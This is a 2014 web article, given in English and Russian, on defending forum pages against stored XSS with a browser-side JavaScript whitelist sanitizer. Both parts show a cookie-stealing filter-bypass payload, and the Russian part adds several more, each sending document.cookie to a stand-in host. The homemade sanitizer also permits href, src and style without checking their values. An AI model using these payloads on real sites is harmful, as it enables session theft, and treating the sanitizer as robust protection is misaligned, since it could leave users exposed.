Sadda.ru Ironetcart Андроид Ассемблер MASM32 Linux Все статьи Table of Contents


 

Frontend protection against Stored XSS Attacks
(Javascript kills XSS)

  Max Petrov August 2014

Stored XSS attacks

      Cross Site Scripting attack is harmful software impact on the user's browser for the purpose of stealing data or causing other harm. To avoid confusion with CSS (Caskading Style Sheets), to denote Cross Site Scripting it was agreed to use the abbreviation XSS.

      Stored XSS Attacks are those in which harmful Javascript is injected by an attacker into the HTML page. This happens through the input forms (text boxes, input boxes, contenteditable elements) on the site. After clicking the Submit button, XSS is sent to the server and is stored there (hence the name Stored XSS). When users request an infected HTML page, the XSS contained in the message is launched by browsers and attacks.

Server (Backend) protection from Stored XSS Attacks

      The solution to the problem seems to be simple. We must prevent the execution in the browser of Javascript code, which can be contained in the text which users add in the site. It is necessary to neutralize in the messages received from the visitors all the places which explicitly or supposedly include Javascript. Such places are
      HTML nodes <SCRIPT> . . . </SCRIPT> ,
      Event handlers in tags ,
      Pseudo-protocols javascript: .

      The links, pictures, styles in tags (there can be an attribute background) are suspicious. Everything is dangerous, where the Internet address can be specified, hence, it can be written a pseudo-protocol javascript: .

      So, the task is to remove dangerous sequences of characters from the text. Usually it is implemented as follows. On the PHP server, the filter parses the text received from the browser, cuts out from it or replaces in it any suspicious fragments. In this approach, there is an error. Browsers execute Javascript without knowing anything about PHP. The server, on the contrary, knows PHP and does not know Javascript. In server protection from XSS, it is bad that it does not understand what it is doing.

      It becomes clear the direction of the malicious efforts of craftsmen of stored XSS-attacks. These craftsmen select for the attacked sites the various ways to obfuscation of malicious Javascript. The PHP filter does not know Javascript, therefore, the PHP filter can be deceived. The worst of all is that sometimes the PHP filter even helps to infect the site.

      The simplest example. The attacker enters
      <p oonmouseovernmouseover='location.href="http://example.com/" + document.cookie'>
The message is sent to the server. On the server the PHP filter sees the dangerous character sequence onmouseover and cuts it out. As a result, not posing any threat (not recognized by browsers) oonmouseovernmouseover turns into an onmouseover. As you can see, the PHP filter did not prevent, but created an XSS attack.

Browser (Frontend) protection from stored XSS-attacks

      We do not need to build an HTML parser. HTML parsers already exist. They exist in the browsers. By using them, it is attractive to shift the task of recognizing stored XSS attacks (and the protection from them) to the browsers. Then it becomes unnecessary to foresee on the server, whether this or that browser would see the active content in the message posted in the forum. It is more logical to ask the browser. If the browser has detected a script, then we should give the browser an order to neutralize the detected script.

Secure upload to the browsers

      Javascript is executed by the browser during the loading of the page. Even if the text fragment is invisible or hidden, if there is Javascript there, this Javascript will be run. Any HTML tag which would prohibit the execution of Javascript has not been invented yet. If such a tag was invented, the question about stored XSS attacks would not be in principle.

      We need passive loading of text in the browser. This loading prevents Javascript from running. The only thing that comes to mind is to use a comment (<!-- . . . -->). Commented string is not interpreted by browsers, is not displayed, but is loaded and embedded in the DOM (Document Object Model). Thus, obviously having on the page of the site a suspicious content in respect to XSS, we can fearlessly return this page to browsers. It is only necessary to comment in advance the doubtful fragments of the text.

      At the end of the loading, the browser should analyze the parts of the text marked by us, secure them, and only then show to user. We will use the event corresponded to the end of the HTML page loading. It is called onload and is applicable to the HTML node body. We write as following
      <body onload='getid("message")'>,
where getid("message") is a function that accepts id of that node whose content should be analyzed and treated.

Selector of fragments (Javascript function)

      MS browser IExplorer of versions 6 or 7 is still used. Based on the Runet statistics, we can estimate the share of IExplorer 6 and 7 as 1% of traffic. Perhaps, these are the most vulnerable browsers. I think the protection should be built in such a manner that it will work starting from IExplorer 6. It does not matter that this will give some roughness in the code.

      IExplorer 6 in response to document.getElementByClassName() outputs an object (not a collection of objects, as one might expect). We have to adapt to the weakest. We will receive the fragments of text as IExplorer 6 wants, that is, one at one time. We have to allow many fragments with the same id on one HTML page. This is against the rules, but we will get the cross-browser script.

      Function getid(id)
function getid(id) { var obj; while ( document.getElementById(id) ) { obj = document.getElementById(id); obj.removeAttribute("id"); obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", ""); clearhtml(obj); obj.innerHTML = obj.innerHTML.replace(/<[^>]*?script[^>]*?>/gi, ""); obj.innerHTML = obj.innerHTML.replace(/<[^>]*?js:[^>]*?>/gi, ""); } }

      Nothing is complex. Each line has explanations (just put the mouse over and a hint will pop up).

HTML cleaner (Javascript function)

      Using the methods and properties of DOM, in particular, you can get:
      the array of inner HTML nodes,
      the name of each inner HTML node,
      the names of all the attributes of each HTML node.

      In the record
<div id="a2" class="myclass" contenteditable="true" align="right" onmousemove="alert('onmousemove!')" style="color:green" blablabla="blablabla">

div is the name of the HTML node. All the rest (id="a2", class="myclass", contenteditable="true", align="right", onmousemove="alert('onmousemove!')", style="color:green", blablabla="blablabla") is the HTML attributes of div node. All, that is written in the tag according to the form name="value", is an attribute. The attributes will be id, class, style, event handlers, and even nonsense sentence like blablabla = "blablabla". In DOM the attributes are not classified according to their name and value. The attributes of event handlers from the point of view of DOM are not different from other attributes.

      Let's apply the white list approach. This is an exhaustive list of allowed tags and attributes. All that does not correspond to the white list, we will destroy ruthlessly. Algorithm. Go through all the child nodes, deleting ones, which are not in the list. In the same way, go through all the attributes of each of the allowed nodes.

      Functions of highest order (array.forEach(), array.some()) can not be applied, IExplorer 6 does not understand such functions. We will do simple cycles. In addition, IExplorer 6 for any tag will find the full set of attributes (several dozens), even if there are no attributes in the tag. Therefore, we should track by the property specified whether each attribute is specified explicitly.

      Another complication related to IExplorer 6. It is not possible to remove in it event handler attributes, using the node.removeAttribute("attrName"), which is common for other browsers. In explorer it works another way: node.attrName = null. However, then it will be necessary to check (at least on the first characters "on") whether the attribute is an event handler. Otherwise, we'll get an emergency abort of the script if we try to reset to zero any non-zeroable attribute (for example, contentEditable).

      Function clearhtml(obj) :
var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' ) var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" ) function clearhtml(obj) { var children = obj.children; for (var i = 0; i < children.length; i++) { if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; } for ( var j = 0; j < tlist.length; j++) { if(children[i].tagName.toUpperCase() == tlist[j]){tagcor = true; break;}else{tagcor = false;} } if ( tagcor ) { j = 0; while (children[i].attributes[j]) { if ( children[i].attributes[j].specified ) { for (var k = 0; k < alist.length; k++) { if (children[i].attributes[j].nodeName == alist[k]){attrcor = true; break;}else{attrcor = false;} } if ( !attrcor ) { if (children[i].attributes[j].nodeName.substring(0,2) == "on") { children[i][children[i].attributes[j].nodeName] = null; } children[i].removeAttribute(children[i].attributes[j].nodeName); children[i].className = "SCRIPTCONTENT"; j--; } } j++; } clearhtml(children[i]); } else { obj.className = "SCRIPTCONTENT"; obj.removeChild(children[i]); } } }

      The explanations in pop up hints. The concepts tag, node, HTML container are used, as synonyms.

      That's all. The code was tested in the browsers: Internet Explorer 6; SlimBrowser 7.00 build 103; Avant Browser 2014 build 7; Firefox 12.0; Safari 5.0.2; Comodo Dragon 4.1.1.12; Opera 18.0; Yandex 13.12.1599.12785; SRWare Iron 6.0.475; Chromium 28.0.1500.75.

In the form of a recipe

      For those who would like to use this, without delving into the meaning, below it is given in the form of a recipe that is suitable for rapid application.

      File script.js :
<SCRIPT> // These are allowed html-containers (all the others will be deleted together with content): var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' ) // These are allowed attributes (all others will be removed from allowed tags): var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" ) function getid(id) { var obj; while ( document.getElementById(id) ) { obj = document.getElementById(id); obj.removeAttribute("id"); obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", ""); obj.innerHTML = obj.innerHTML.replace(/script:/gi, "script:"); obj.innerHTML = obj.innerHTML.replace(/js:/gi, "js:"); clearhtml(obj); } } function clearhtml(obj) { var children = obj.children; for (var i = 0; i < children.length; i++) { if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; } for ( var j = 0; j < tlist.length; j++) { if(children[i].tagName.toUpperCase() == tlist[j]){tagcor = true; break;}else{tagcor = false;} } if ( tagcor ) { j = 0; while (children[i].attributes[j]) { if ( children[i].attributes[j].specified ) { for (var k = 0; k < alist.length; k++) { if (children[i].attributes[j].nodeName == alist[k]){attrcor = true; break;}else{attrcor = false;} } if ( !attrcor ) { if (children[i].attributes[j].nodeName.substring(0,2) == "on") { children[i][children[i].attributes[j].nodeName] = null; } children[i].removeAttribute(children[i].attributes[j].nodeName); children[i].className = "SCRIPTCONTENT"; j--; } } j++; } clearhtml(children[i]); } else { obj.className = "SCRIPTCONTENT"; obj.removeChild(children[i]); } } } </SCRIPT>

      Site page on the server:
<html> <head> <script type="text/javascript" src="script.js"></script> </head> <body onload='getid("message")'> <div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div> <div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div> <div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div> </body> </html>

      By red it is highlighted all necessary strings. On the server, the message processing consists solely in deleting the comment tags (if such tags will be detected). In other words, from the text to be added to the site, you must always remove (or replace) the character sequences <!-- and -->. A potentially dangerous fragment must be inserted by server into the container
      <div id ="message"><!-- HERE IS MALICIOUS CONTENT --></div>
Do not forget to write to the tag body the handler onload='getid("message")'. Write the allowed tags and attributes into a script file.

Discussion

      Please, write here your questions, comments, opinions: http://ironburattin.ru/6/index.php .



Table of Contents

Assembler MASM32

      The simplest assembly program (beeper)
      Variables and Data Types of Assembler
      Registers of Processor IA32
      Numerical Systems, conversion of number
      Negative numbers

Other articles

      Frontend protection against Stored XSS Attacks (Javascript kills XSS)
      How to enforce Firefox to update favicon
      How to lock CD autorun in Windows XP
      Javascript Progress Bar for PHP program
      Schultz's tables (Shultzstables.exe)
      Speed of Forum Engine. Files or Database
      The best free programs for reading txt-files on Android smartphones
      Why a stupid forum needs a search option?

     


© Max Petrov При использовании материалов ссылка на sadda.ru обязательна

Sadda.ru Ironetcart Андроид Ассемблер MASM32 Linux Все статьи Table of Contents


 

Хранимые XSS-атаки и защита от них
(удаляем javascript из html в браузере)

  Макс Петров август 2014

Хранимые XSS-атаки

      Cross Site Scripting атака - это злонамеренное программное воздействие на браузер пользователя в целях кражи данных или причинения иного вреда. Чтобы не бросать тень на CSS (Caskading Style Sheets), договорились в сокращенном обозначении заменять первый символ, получили аббревиатуру: XSS-атака.

      Хранимые XSS-атаки - такие, при которых скрипт добавляется злоумышленником в тело страницы (посредством форм ввода - текстовых полей, инпутов, contenteditable- элементов - на форумах, в гостевых книгах и т.п.). Вставленный в сообщение замаскированный XSS-скрипт сохраняется (отсюда и название) сайтом, затем, при запросе пользователями зараженной страницы, запускается и атакует.

Варианты оформления внедряемого XSS-кода, ворующего куки

      В тегах <SCRIPT> . . . </SCRIPT> :
<script type='text/javascript'> location.href="http://example.com/" + document.cookie; </script>

      В виде обработчика событий в html-теге :
<p onmouseover='location.href="http://example.com/" + document.cookie'> Какой-то текст </p>

      С использованием псевдопротокола javascript: :
<iframe src='javascript:open("http://example.com/" + document.cookie)'></iframe>

      Результатом встраивания любого из этих примеров в страницу чужого сайта будет формирование от браузеров, загрузивших ее, запроса вида
      http://example.com/login=sasha;%20parol=terminator,
где http://example.com/ - сайт злоумышленника, а login=sasha, parol=terminator - куки с компьютера пользователя (куки или сам тип воруемой информации могут быть иными, но нам данное обстоятельство сейчас не важно). На сайте вора страницы с запрашиваемым адресом, понятно, нет, поэтому сервер его домена (http://example.com/) сгенерирует 404-ошибку, которую легко перехватить и записать адрес запроса в лог. Таким образом, когда вредитель внедрит в страницу чужого сайта любой из вышеприведенных XSS-скриптов (в отсутствие мер защиты на сайте), тогда в течение некоторого времени на сервере http://example.com/ автоматически сформируется лог-файл, содержащий сведения о куках с браузеров всех загрузивших зараженную страницу пользователей.

Серверная защита от хранимых XSS-атак

      Решение проблемы очевидно: исключить возможность программного исполнения в браузере вводимого пользователем, сохраняемого и показываемого затем другим пользователям текста. Следовательно, необходимо нейтрализовать во вводе все те места, которые явно или предположительно включают в себя скрипт, как то:
      - контейнеры <SCRIPT> . . . </SCRIPT>;
      - обработчики событий в тегах;
      - псевдопротоколы javascript: .

      Под сомнение попадают также ссылки, картинки, стили в тегах (там может быть "background") - все, где может быть указан Интернет-адрес, соответственно, может быть записан псевдопротокол javascript: .

      Казалось бы, просто: убрать из текста заранее известные опасные последовательности символов. Так обычно и делают: на сервере php-обработчик (фильтр) парсит ввод, вырезает из него или заменяет в нем подозрительные фрагменты. Но! Браузеры ведь исполняют JavaScript, ничего "не зная" о PHP, сервер, наоборот, "не ведает" о javascript-е. В серверной защите плохо то, что она, по большому счету, не понимает, что она делает. Отсюда становятся понятными усилия "умельцев" хранимых XSS-атак. Последние двигаются в направлении подбора для атакуемых движков такого способа порчи вредоносного скрипта, при котором фильтр на сервере уже его не распознает, а иногда даже помогает заражению сайта.

      Простейший пример. Злоумышленник вводит:
      <p oonmouseovernmouseover='location.href="http://example.com/" + document.cookie'>
Сообщение отправляется на север. На сервере фильтр "видит" опасную символьную последовательность onmouseover и вырезает ее. В итоге, не представляющее никакой угрозы (не распознаваемое браузерами) oonmouseovernmouseover превращается в onmouseover, т.е. в понятное браузерам указание на событие. В общем случае, хранимые XSS-атаки так и осуществляют: вводят в поля сайта комбинации символов, отправляют, смотрят, что получается на выходе. Далее делают предположения о том, как работает фильтр и начинают составлять "боевую" комбинацию для него.

      Чтобы полноценно распознавать html на сервере, там нужен html-парсер, который учтет все, вплоть до особенностей различных версий того или иного браузера. Не кросс-, а СВЕРХ-браузерный парсер. Решение может быть более сложным, чем сама задача.

Браузерная защита от хранимых XSS-атак

      Html-парсеры ведь уже есть - в браузерах. Пользуясь этим, заманчиво переложить задачу распознавания хранимых XSS-атак (ну, и защиту от них) на сами браузеры. Тогда станет ненужным предугадывать на сервере, увидит ли в добавленном на форум сообщении активное содержимое Firefox, увидит ли там активное содержимое Интернет-эксплорер и т.д. Логичнее спросить у браузера: "Ты, Firefox, видишь здесь скрипт?". Или: "Ты, Интернет-эксплорер, видишь в этом сообщении активное содержимое?" Если браузер - именно этот, конкретный, этой версии - обнаружил скрипт, тогда можно отдать браузеру приказ нейтрализовать обнаруженное.

Безопасная загрузка в браузер

      Скрипты выполняются браузером по ходу загрузки страницы. Пусть даже фрагмент текста невидим или скрыт - если там есть скрипт, скрипт обязательно будет запущен. Какого-то html-контейнера, запрещающего исполнение скриптов, до сих пор не изобретено (если бы такой контейнер придумали, вопроса хранимых XSS-атак не стояло бы в принципе).

      Нам нужна "пассивная" загрузка - чтобы скрипты не запускались. Единственное, что приходит на ум - использовать комментарий (<!-- . . . -->). Закомментированное браузерами не интерпретируется, не отображается, но загружается и встраивается в DOM (Document Object Model). Таким образом, заведомо имея на странице сайта подозрительный в отношении XSS контент, мы можем, тем не менее, безбоязненно отдавать эту страницу браузерам, лишь предварительно закомментировав сомнительные в плане безопасности фрагменты.

      По окончании загрузки, браузер должен отмеченные нами части текста проанализировать, обезопасить их, затем только показать пользователю. Событие, соответствующее окончанию загрузки страницы, есть, называется оно onload, применимо к контейнеру body. Значит, тело страниц нашего сайта, по крайней мере, тех из них, которые содержат добавляемый пользователями контент, должно реагировать на окончание загрузки:
      <body onload='getid("message")'>,
где getid("message") - функция, принимающая идентификатор того html-контейнера, содержимое которого должно быть проанализировано и обезврежено.

Функция: выборщик фрагментов

      Интернет-эксплорер версий 6 или 7, сейчас - летом 2014 года - еще используют. Исходя из рунетовских статистик можно оценить долю эксплореров 6 и 7, вместе взятых, в 1% трафика. Пожалуй, это самые уязвимые браузеры. Я думаю, защиту надо строить такую, которая будет работать, начиная с шестого эксплорера. Пусть это и даст некоторые шероховатости в коде.

      Шестой эксплорер в ответ на document.getElementByClassName() выдает объект (не коллекцию объектов, как можно было бы ожидать). Подстраиваться приходится под самого слабого, поэтому, будем получать фрагменты текста так, как хочет эксплорер 6 - по одному. Опираться будем все же на id, но при этом допуская множество фрагментов с одинаковым id на одной странице. Такое против правил, зато получится кроссбраузерно.

      Функция getid(id) :
function getid(id) { var obj; while ( document.getElementById(id) ) { obj = document.getElementById(id); obj.removeAttribute("id"); obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", ""); clearhtml(obj); obj.innerHTML = obj.innerHTML.replace(/<[^>]*?script[^>]*?>/gi, ""); obj.innerHTML = obj.innerHTML.replace(/<[^>]*?js:[^>]*?>/gi, ""); } }

      Ничего сложного, тем не менее, по каждой строке есть пояснения - в титлах (просто наведите курсор).

Функция: чистильщик html

      Пользуясь методами и свойствами DOM, в частности, можно получить:
      - массив вложенных html-контейнеров;
      - имя каждого вложенного html-контейнера;
      - имена всех атрибутов каждого html-контейнера.
В записи вида
      <div id="a2" class="myclass" contenteditable="true" align="right" onmousemove="alert('onmousemove!')" style="color:green" bebebe="hi-hi-hi">
div - это имя html-контейнера (узла, или ноды); а id="a2", class="myclass", contenteditable="true", align="right", onmousemove="alert('onmousemove!')", style="color:green", bebebe="hi-hi-hi" - это его атрибуты. Все, что записано в теге по форме имя="значение", является атрибутом. Атрибутом будут и идентификатор, и класс, и стиль, и обработчик события, и бессмыслица типа bebebe="hi-hi-hi". В DOM атрибуты не классифицируются в зависимости от их имени и значения. Запросить же и получить от браузера именно атрибуты-обработчики событий нельзя.

      Применим подход "белого списка" - исчерпывающего перечня разрешенных тегов и атрибутов. Все, что не соответствует белому списку, будем безжалостно уничтожать. Алгоритм: перебрать все дочерние узлы, удаляя такие, которых нет в разрешающем списке, таким же образом перебрать все атрибуты для каждого из разрешенных узлов.

      Функции высшего порядка - array.forEach(), array.some() - применить не получится, шестой Интернет-эксплорер таких функций не поймет. Обойдемся простыми циклами. Кроме того, шестой эксплорер для любого тега будет находить полный комплект атрибутов (несколько десятков), даже в том случае, если никаких атрибутов в теге записано не было. Поэтому, придется прослеживать по свойству specified , задан ли каждый атрибут явно.

      Еще одна сложность, связанная с шестым эксплорером. Не удается в нем удалить атрибуты-обработчики событий, используя общеупотребимое для других браузеров node.removeAttribute("attrName"). Срабатывает в эксплорере для атрибутов-обработчиков такое: node.attrName = null, однако, тогда надо будет проверять (хотя бы по первым символам "on"), является ли атрибут обработчиком - иначе получим аварийное прервание скрипта при попытке обнулить какой-нибудь необнуляемый атрибут (например, contentEditable).

      Функция clearhtml(obj) :
var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' ) var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" ) function clearhtml(obj) { var children = obj.children; for (var i = 0; i < children.length; i++) { if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; } for ( var j = 0; j < tlist.length; j++) { if(children[i].tagName.toUpperCase() == tlist[j]){tagcor = true; break;}else{tagcor = false;} } if ( tagcor ) { j = 0; while (children[i].attributes[j]) { if ( children[i].attributes[j].specified ) { for (var k = 0; k < alist.length; k++) { if (children[i].attributes[j].nodeName == alist[k]){attrcor = true; break;}else{attrcor = false;} } if ( !attrcor ) { if (children[i].attributes[j].nodeName.substring(0,2) == "on") { children[i][children[i].attributes[j].nodeName] = null; } children[i].removeAttribute(children[i].attributes[j].nodeName); children[i].className = "SCRIPTCONTENT"; j--; } } j++; } clearhtml(children[i]); } else { obj.className = "SCRIPTCONTENT"; obj.removeChild(children[i]); } } }

      Пояснения в титлах. Понятия тег, узел, html-контейнер используются, как синонимы.

      Вот и все. Работоспособность кода проверена в браузерах: Internet Explorer 6; SlimBrowser 7.00 build 103; Avant Browser 2014 build 7; Firefox 12.0; Safari 5.0.2; Comodo Dragon 4.1.1.12; Opera 18.0; Yandex 13.12.1599.12785; SRWare Iron 6.0.475; Chromium 28.0.1500.75.

В виде рецепта

      Для тех, кто желает использовать это, не вникая в смысл, изложу в форме рецепта, годного к быстрому применению.

      Файл script.js :
<SCRIPT> // это разрешенные html-контейнеры (все остальные будут удалены вместе с содержимым): var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' ) // это разрешенные атрибуты (все остальные будут удалены из разрешенных тегов): var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" ) function getid(id) { var obj; while ( document.getElementById(id) ) { obj = document.getElementById(id); obj.removeAttribute("id"); obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", ""); obj.innerHTML = obj.innerHTML.replace(/script:/gi, "script:"); obj.innerHTML = obj.innerHTML.replace(/js:/gi, "js:"); clearhtml(obj); } } function clearhtml(obj) { var children = obj.children; for (var i = 0; i < children.length; i++) { if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; } for ( var j = 0; j < tlist.length; j++) { if(children[i].tagName.toUpperCase() == tlist[j]){tagcor = true; break;}else{tagcor = false;} } if ( tagcor ) { j = 0; while (children[i].attributes[j]) { if ( children[i].attributes[j].specified ) { for (var k = 0; k < alist.length; k++) { if (children[i].attributes[j].nodeName == alist[k]){attrcor = true; break;}else{attrcor = false;} } if ( !attrcor ) { if (children[i].attributes[j].nodeName.substring(0,2) == "on") { children[i][children[i].attributes[j].nodeName] = null; } children[i].removeAttribute(children[i].attributes[j].nodeName); children[i].className = "SCRIPTCONTENT"; j--; } } j++; } clearhtml(children[i]); } else { obj.className = "SCRIPTCONTENT"; obj.removeChild(children[i]); } } } </SCRIPT>

      Страница сайта на сервере:
<html> <head> <script type="text/javascript" src="script.js"></script> </head> <body onload='getid("message")'> <div id ="message"> <!-- <?php require("message-255.htm"); ?> --> </div> <div id ="message"> <!-- <?php require("message-256.htm"); ?> --> </div> <div id ="message"> <!-- <?php require("message-257.htm"); ?> --> </div> </body> </html>

      Красным выделено необходимое. Добавляемый потенциально опасный фрагмент должен подгружаться сервером именно в тег комментария. Из добавляемого фрагмента на сервере надо обязательно удалить (или заменить чем-либо) символьные последовательности: <!-- и -->. Разрешенные теги и атрибуты записывайте в файл скрипта.

Обсуждение

      Все вышеизложенное вызвано моими усилиями по написанию визуального редактора для движка "Железный Бураттин". Поэтому, вопросы, замечания, мнения пишите на форум поддержки, в раздел Визуальный редактор .



Ironetcart

      Техническая поддержка: http://ironburattin.ru
      Взять движок: Форум на файлах «Ironetcart» (скачать)

      Разработка форумного движка
      Форум «Железный Бураттин» (название и концепция)
      Статическая защита форм
      Идеальная капча
      Как я победил магические кавычки
      Внеклавиатурные символы HTML
      Хранимые XSS-атаки и защита от них (удаляем javascript из html в браузере)
      Защита визуального html-редактора (фильтрация HTML на стороне сервера)
      Скорость движка форума: файлы или база данных
      Прогресс-бар на PHP
      Зачем тупому форуму поиск?

     


© Max Petrov При использовании материалов ссылка на sadda.ru обязательна